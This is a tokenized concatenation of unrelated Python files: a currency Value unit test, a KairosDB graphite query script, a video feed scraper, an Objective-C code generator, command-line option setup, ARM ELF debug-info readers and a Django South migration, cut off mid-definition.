) } ) <EOL> value2 = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> value3 = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertTrue ( value == value2 ) <EOL> self . assertFalse ( value == value3 ) <EOL> self . assertFalse ( value == None ) <EOL> def testMultiplication ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> value2 = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertEqual ( value2 , value * Decimal ( <NUM_LIT:2> ) ) <EOL> self . assertEqual ( value2 , value * Decimal ( "<STR_LIT>" ) ) <EOL> def testFormat ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( value ) ) <EOL> self . assertEqual ( "<STR_LIT:0>" , str ( ZERO ) ) <EOL> def testComparison ( self ) : <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> value2 = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertGreater ( value , value2 ) <EOL> self . assertLess ( value2 , value ) <EOL> self . assertGreaterEqual ( value , value2 ) <EOL> self . assertGreaterEqual ( value , value ) <EOL> self . assertLessEqual ( value2 , value ) <EOL> self . assertLessEqual ( value2 , value2 ) <EOL> def testParsePositive ( self ) : <EOL> value = Value . parse ( "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:2> , value . precision ) <EOL> def testParseNegative ( self ) : <EOL> value = Value . parse ( "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:2> , value . precision ) <EOL> def testParsePrecision ( self ) : <EOL> value = Value . parse ( "<STR_LIT>" ) <EOL> self . assertEqual ( <NUM_LIT:4> , value . precision ) <EOL> class MultipleCurrencies ( unittest . TestCase ) : <EOL> def testComponents ( self ) : <EOL> value1 = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> value2 = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> value = Value ( { "<STR_LIT>" : Decimal ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : Decimal ( "<STR_LIT>" ) } ) <EOL> self . assertItemsEqual ( [ value1 , value2 ] , value . components ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import time <EOL> import pyKairosDB <EOL> from pyKairosDB import util as util <EOL> from pyKairosDB import graphite <EOL> c = pyKairosDB . connect ( ) <EOL> start_time = time . time ( ) - <NUM_LIT> <EOL> end_time = time . time ( ) <EOL> metrics_list = graphite . expand_graphite_wildcard_metric_name ( c , "<STR_LIT>" ) <EOL> ( timeinfo , datapoints ) = graphite . read_absolute ( c , metrics_list [ <NUM_LIT:0> ] , start_time , end_time ) <EOL> print "<STR_LIT>" <EOL> print datapoints <EOL> print "<STR_LIT>" <EOL> print timeinfo </s>
<s> import urlparse <EOL> import feedparser <EOL> from vidscraper . exceptions import UnhandledFeed <EOL> from vidscraper . suites import BaseSuite , registry <EOL> from vidscraper . utils . feedparser import ( get_accepted_enclosures , <EOL> struct_time_to_datetime ) <EOL> from vidscraper . videos import FeedparserFeed , VideoFile <EOL> feedparser . _FeedParserMixin . namespaces [ <EOL> '<STR_LIT>' ] = '<STR_LIT>' <EOL> class Feed ( FeedparserFeed ) : <EOL> schemes = ( '<STR_LIT:http>' , '<STR_LIT>' ) <EOL> netlocs = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' <EOL> page_url_format = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def _next_page ( self ) : <EOL> if self . start_index != <NUM_LIT:1> or self . item_count > <NUM_LIT:0> : <EOL> raise StopIteration <EOL> super ( Feed , self ) . _next_page ( ) <EOL> def get_url_data ( self , url ) : <EOL> parsed_url = urlparse . urlsplit ( url ) <EOL> if ( parsed_url . scheme in self . schemes and <EOL> parsed_url . netloc in self . netlocs and <EOL> parsed_url . path == self . path ) : <EOL> parsed_qs = urlparse . parse_qs ( parsed_url . query ) <EOL> try : <EOL> return { <EOL> '<STR_LIT>' : parsed_qs [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : parsed_qs [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : parsed_qs [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , <EOL> } <EOL> except ( KeyError , IndexError ) : <EOL> pass <EOL> raise UnhandledFeed ( url ) <EOL> def get_video_data ( self , item ) : <EOL> files = [ VideoFile ( url = enclosure . get ( '<STR_LIT:url>' ) , <EOL> mime_type = enclosure . get ( '<STR_LIT:type>' ) , <EOL> length = ( enclosure . get ( '<STR_LIT>' ) or <EOL> enclosure . get ( '<STR_LIT>' ) ) ) <EOL> for enclosure in get_accepted_enclosures ( item ) ] <EOL> data = { <EOL> '<STR_LIT:title>' : item . title , <EOL> '<STR_LIT:description>' : item . description , <EOL> '<STR_LIT>' : item . media_thumbnail [ <NUM_LIT:0> ] [ '<STR_LIT:url>' ] , <EOL> '<STR_LIT>' : struct_time_to_datetime ( item . published_parsed ) , <EOL> '<STR_LIT:user>' : item [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : files or None , <EOL> } <EOL> return data <EOL> class Suite ( BaseSuite ) : <EOL> feed_class = Feed <EOL> registry . register ( Suite ) </s>
<s> from __future__ import unicode_literals <EOL> from pdefc import lang , __version__ <EOL> from pdefc . templates import Templates , write_file , upper_first , lower_first <EOL> IMPL_TEMPLATE = '<STR_LIT>' <EOL> HEADER_TEMPLATE = '<STR_LIT>' <EOL> STRUCT_SUFFIX = '<STR_LIT>' <EOL> INTERFACE_SUFFIX = '<STR_LIT>' <EOL> GENERATED_BY = '<STR_LIT>' % __version__ <EOL> def generate ( package , dst , prefix = None ) : <EOL> generator = Generator ( prefix ) <EOL> return generator . generate ( package , dst ) <EOL> class Generator ( object ) : <EOL> def __init__ ( self , prefix = None ) : <EOL> self . prefix = prefix or '<STR_LIT>' <EOL> self . templates = Templates ( __file__ , filters = self ) <EOL> def generate ( self , package , dst ) : <EOL> for file in package . files : <EOL> for type0 in file . types : <EOL> name = self . objc_name ( type0 ) <EOL> template_h , template_m = self . _template_names ( type0 ) <EOL> self . _generate ( type0 , dst , '<STR_LIT>' % name , template_h ) <EOL> self . _generate ( type0 , dst , '<STR_LIT>' % name , template_m ) <EOL> def _generate ( self , type0 , dst , filename , tmpl ) : <EOL> name = self . objc_name ( type0 ) <EOL> code = self . templates . render ( tmpl , definition = type0 , name = name , generated_by = GENERATED_BY ) <EOL> write_file ( dst , filename , code ) <EOL> def _template_names ( self , type0 ) : <EOL> if type0 . is_struct : <EOL> return '<STR_LIT>' , '<STR_LIT>' <EOL> elif type0 . is_interface : <EOL> return '<STR_LIT>' , '<STR_LIT>' <EOL> elif type0 . is_enum : <EOL> return '<STR_LIT>' , '<STR_LIT>' <EOL> def objc_name ( self , type0 ) : <EOL> name = self . prefix + type0 . name <EOL> if type0 . is_struct and not type0 . is_exception : <EOL> suffix = STRUCT_SUFFIX <EOL> elif type0 . is_interface : <EOL> suffix = INTERFACE_SUFFIX <EOL> else : <EOL> suffix = None <EOL> if not suffix or name . lower ( ) . endswith ( suffix . lower ( ) ) : <EOL> return name <EOL> return name + suffix <EOL> def objc_type ( self , type0 ) : <EOL> '''<STR_LIT>''' <EOL> if type0 in _TYPES : <EOL> return _TYPES [ type0 ] <EOL> if type0 . is_list : <EOL> return '<STR_LIT>' <EOL> elif type0 . is_set : <EOL> return '<STR_LIT>' <EOL> elif type0 . is_map : <EOL> return '<STR_LIT>' <EOL> elif type0 . is_enum : <EOL> return '<STR_LIT>' % self . objc_name ( type0 ) <EOL> return '<STR_LIT>' % ( self . objc_name ( type0 ) ) <EOL> def objc_reflex ( self , type0 ) : <EOL> '''<STR_LIT>''' <EOL> if type0 in _REFLEX_TYPES : <EOL> return _REFLEX_TYPES [ type0 ] <EOL> if type0 . is_list : <EOL> return '<STR_LIT>' % self . objc_reflex ( type0 . element ) <EOL> elif type0 . is_set : <EOL> return '<STR_LIT>' % self . objc_reflex ( type0 . element ) <EOL> elif type0 . is_map : <EOL> key = self . objc_reflex ( type0 . key ) <EOL> value = self . objc_reflex ( type0 . value ) <EOL> return '<STR_LIT>' % ( key , value ) <EOL> elif type0 . is_enum : <EOL> return '<STR_LIT>' % self . objc_name ( type0 ) <EOL> return '<STR_LIT>' % self . objc_name ( type0 ) <EOL> def objc_signature ( self , method ) : <EOL> '''<STR_LIT>''' <EOL> s = [ ] <EOL> if method . is_last : <EOL> s . append ( '<STR_LIT>' ) <EOL> else : <EOL> s . append ( '<STR_LIT>' % self . objc_type ( method . result ) ) <EOL> s . append ( method . name ) <EOL> is_first = True <EOL> colon_index = <NUM_LIT:0> <EOL> for arg in method . args : <EOL> if is_first : <EOL> s . append ( '<STR_LIT>' ) <EOL> s . append ( upper_first ( arg . name ) ) <EOL> s . append ( '<STR_LIT::>' ) <EOL> colon_index = '<STR_LIT>' . join ( s ) . index ( '<STR_LIT::>' ) <EOL> is_first = False <EOL> else : <EOL> s . append ( '<STR_LIT:\n>' ) <EOL> spaces = max ( colon_index - len ( arg . name ) , <NUM_LIT:0> ) <EOL> s . append ( '<STR_LIT:U+0020>' * spaces ) <EOL> s . append ( arg . name ) <EOL> s . append ( '<STR_LIT::>' ) <EOL> s . append ( '<STR_LIT>' % self . objc_type ( arg . type ) . strip ( ) ) <EOL> s . append ( arg . name ) <EOL> return '<STR_LIT>' . join ( s ) <EOL> def objc_selector ( self , method ) : <EOL> s = [ method . name ] <EOL> is_first = True <EOL> for arg in method . args : <EOL> if is_first : <EOL> s . append ( '<STR_LIT>' ) <EOL> s . append ( upper_first ( arg . name ) ) <EOL> is_first = False <EOL> else : <EOL> s . append ( arg . name ) <EOL> s . append ( '<STR_LIT::>' ) <EOL> return '<STR_LIT>' . join ( s ) <EOL> def objc_method_options ( self , method ) : <EOL> s = [ ] <EOL> if method . is_get : <EOL> s . append ( '<STR_LIT>' ) <EOL> elif method . is_post : <EOL> s . append ( '<STR_LIT>' ) <EOL> if method . is_request : <EOL> s . append ( '<STR_LIT>' ) <EOL> return '<STR_LIT>' . join ( s ) <EOL> _TYPES = { <EOL> lang . BOOL : '<STR_LIT>' , <EOL> lang . INT16 : '<STR_LIT>' , <EOL> lang . INT32 : '<STR_LIT>' , <EOL> lang . INT64 : '<STR_LIT>' , <EOL> lang . FLOAT : '<STR_LIT>' , <EOL> lang . DOUBLE : '<STR_LIT>' , <EOL> lang . STRING : '<STR_LIT>' , <EOL> lang . DATETIME : '<STR_LIT>' , <EOL> lang . VOID : '<STR_LIT>' , <EOL> } <EOL> _REFLEX_TYPES = { <EOL> lang . BOOL : '<STR_LIT>' , <EOL> lang . INT16 : '<STR_LIT>' , <EOL> lang . INT32 : '<STR_LIT>' , <EOL> lang . INT64 : '<STR_LIT>' , <EOL> lang . FLOAT : '<STR_LIT>' , <EOL> lang . DOUBLE : '<STR_LIT>' , <EOL> lang . STRING : '<STR_LIT>' , <EOL> lang . DATETIME : '<STR_LIT>' , <EOL> lang . VOID : '<STR_LIT>' , <EOL> } </s>
<s> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> import os <EOL> from optparse import OptionGroup , NO_DEFAULT <EOL> from optparse import TitledHelpFormatter <EOL> try : <EOL> import wx <EOL> have_wx = True <EOL> except ImportError : <EOL> have_wx = False <EOL> class MyHelpFormatter ( TitledHelpFormatter ) : <EOL> def format_option ( self , option ) : <EOL> old_help = option . help <EOL> default = option . default <EOL> if isinstance ( default , str ) and '<STR_LIT:U+0020>' in default : <EOL> default = repr ( default ) <EOL> if option . help is None : <EOL> option . help = '<STR_LIT>' % ( option . type ) <EOL> if option . type == '<STR_LIT>' : <EOL> choices = [ ] <EOL> for choice in option . choices : <EOL> if choice == option . default : <EOL> if '<STR_LIT:U+0020>' in choice : <EOL> choice = repr ( choice ) <EOL> choice = '<STR_LIT:[>' + choice + '<STR_LIT:]>' <EOL> else : <EOL> if '<STR_LIT:U+0020>' in choice : <EOL> choice = repr ( choice ) <EOL> choices . append ( choice ) <EOL> option . help = '<STR_LIT>' % ( option . help , '<STR_LIT:U+002CU+0020>' . join ( choices ) ) <EOL> else : <EOL> if default != NO_DEFAULT : <EOL> if option . action == '<STR_LIT>' : <EOL> option . help = '<STR_LIT>' % ( option . help , not default ) <EOL> else : <EOL> option . help = '<STR_LIT>' % ( option . help , default ) <EOL> result = TitledHelpFormatter . format_option ( self , option ) <EOL> option . help = old_help <EOL> return result <EOL> help_formatter = MyHelpFormatter ( ) <EOL> def set_formatter ( parser ) : <EOL> """<STR_LIT>""" <EOL> parser . formatter = help_formatter <EOL> def set_convert_options ( parser ) : <EOL> set_formatter ( parser ) <EOL> if os . name == '<STR_LIT>' : <EOL> try : <EOL> import matplotlib <EOL> matplotlib . use ( '<STR_LIT>' ) <EOL> parser . run_methods = [ '<STR_LIT>' ] <EOL> except ImportError : <EOL> pass <EOL> parser . set_usage ( '<STR_LIT>' ) <EOL> parser . set_description ( '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , <EOL> type = '<STR_LIT:file>' if have_wx else str , metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , <EOL> type = '<STR_LIT:file>' if have_wx else str , metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> type = '<STR_LIT>' , default = '<STR_LIT:none>' , <EOL> choices = [ '<STR_LIT:none>' , '<STR_LIT>' ] , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> type = '<STR_LIT:string>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> def set_info_options ( parser ) : <EOL> set_formatter ( parser ) <EOL> if os . name == '<STR_LIT>' : <EOL> try : <EOL> import matplotlib <EOL> matplotlib . use ( '<STR_LIT>' ) <EOL> parser . run_methods = [ '<STR_LIT>' ] <EOL> except ImportError : <EOL> pass <EOL> parser . set_usage ( '<STR_LIT>' ) <EOL> parser . set_description ( '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , <EOL> type = '<STR_LIT:file>' if have_wx else str , metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , default = False , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> parser . add_option ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , default = False , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> parser . add_option ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , default = False , <EOL> help = '<STR_LIT>' <EOL> ) <EOL> parser . add_option ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> action = '<STR_LIT>' , help = '<STR_LIT>' ) </s>
<s> import subprocess <EOL> import re <EOL> from . import ARM_CS_TOOLS <EOL> class LineReader ( object ) : <EOL> def __init__ ( self , elf_path ) : <EOL> self . elf = elf_path <EOL> def _exec_tool ( self ) : <EOL> return subprocess . check_output ( [ ARM_CS_TOOLS + "<STR_LIT>" , "<STR_LIT>" , self . elf ] ) <EOL> def get_line_listing ( self ) : <EOL> decoded = self . _exec_tool ( ) <EOL> lines = [ <EOL> { '<STR_LIT:file>' : x . group ( <NUM_LIT:1> ) , '<STR_LIT>' : int ( x . group ( <NUM_LIT:2> ) ) , '<STR_LIT:address>' : int ( x . group ( <NUM_LIT:3> ) , <NUM_LIT:16> ) } <EOL> for x in re . finditer ( r"<STR_LIT>" , decoded , re . MULTILINE ) <EOL> ] <EOL> files = [ x . group ( <NUM_LIT:1> ) for x in re . finditer ( r"<STR_LIT>" , decoded , re . MULTILINE ) ] <EOL> return files , lines <EOL> def get_compact_listing ( self ) : <EOL> files , lines = self . get_line_listing ( ) <EOL> file_id_lookup = { files [ x ] : x for x in xrange ( len ( files ) ) } <EOL> compact_lines = [ ( x [ '<STR_LIT:address>' ] , file_id_lookup [ x [ '<STR_LIT:file>' ] ] , x [ '<STR_LIT>' ] ) for x in lines ] <EOL> compact_lines . sort ( key = lambda x : x [ <NUM_LIT:0> ] ) <EOL> return { '<STR_LIT>' : files , '<STR_LIT>' : compact_lines } <EOL> class FunctionRange ( object ) : <EOL> def __init__ ( self , name , start , end , line = None ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> self . start = start <EOL> self . end = end <EOL> self . line = line <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . start , self . end , self . line ) <EOL> class FunctionReader ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , elf_path ) : <EOL> self . elf = elf_path <EOL> def _exec_tool ( self ) : <EOL> return subprocess . check_output ( [ ARM_CS_TOOLS + "<STR_LIT>" , "<STR_LIT>" , self . elf ] ) <EOL> def _decode_info_fields ( self , content ) : <EOL> """<STR_LIT>""" <EOL> lines = content . split ( "<STR_LIT:\n>" ) <EOL> keys = { } <EOL> for line in lines : <EOL> line_parts = re . split ( r"<STR_LIT>" , line . strip ( ) , <NUM_LIT:3> ) <EOL> if len ( line_parts ) < <NUM_LIT:4> : <EOL> continue <EOL> keys [ line_parts [ <NUM_LIT:1> ] ] = line_parts [ <NUM_LIT:3> ] <EOL> return keys <EOL> def iter_info_groups ( self ) : <EOL> content = self . _exec_tool ( ) <EOL> for match in re . finditer ( r"<STR_LIT>" , content , re . DOTALL ) : <EOL> fields = self . _decode_info_fields ( match . group ( <NUM_LIT:1> ) ) <EOL> if '<STR_LIT>' not in fields or '<STR_LIT>' not in fields or '<STR_LIT>' not in fields : <EOL> continue <EOL> fn_name = fields [ '<STR_LIT>' ] . split ( '<STR_LIT:U+0020>' ) [ - <NUM_LIT:1> ] <EOL> fn_start = int ( fields [ '<STR_LIT>' ] , <NUM_LIT:16> ) <EOL> fn_end = int ( fields [ '<STR_LIT>' ] , <NUM_LIT:16> ) <EOL> fn_line = int ( fields [ '<STR_LIT>' ] ) if '<STR_LIT>' in fields else None <EOL> yield FunctionRange ( fn_name , fn_start , fn_end , fn_line ) <EOL> def get_info_groups ( self ) : <EOL> return list ( self . iter_info_groups ( ) ) <EOL> def create_coalesced_group ( elf ) : <EOL> dict = LineReader ( elf ) . get_compact_listing ( ) <EOL> dict [ '<STR_LIT>' ] = sorted ( [ ( x . start , x . end , x . name , x . line ) for x in FunctionReader ( elf ) . iter_info_groups ( ) ] , key = lambda x : x [ <NUM_LIT:0> ] ) <EOL> return dict </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . add_column ( u'<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( null = True , blank = True ) , <EOL> keep_default = False ) <EOL> db . add_column ( u'<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( null = True , blank = True ) , <EOL> keep_default = False ) <EOL> db . add_column ( u'<STR_LIT>' , '<STR_LIT>' , <EOL> self . gf ( '<STR_LIT>' ) ( null = True , blank = True ) , <EOL> keep_default = False ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_column ( u'<STR_LIT>' , '<STR_LIT>' ) <EOL> db . delete_column ( u'<STR_LIT>' , '<STR_LIT>' ) <EOL> db . delete_column ( u'<STR_LIT>' , '<STR_LIT>' ) <EOL> models = { <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:state>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:1>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { 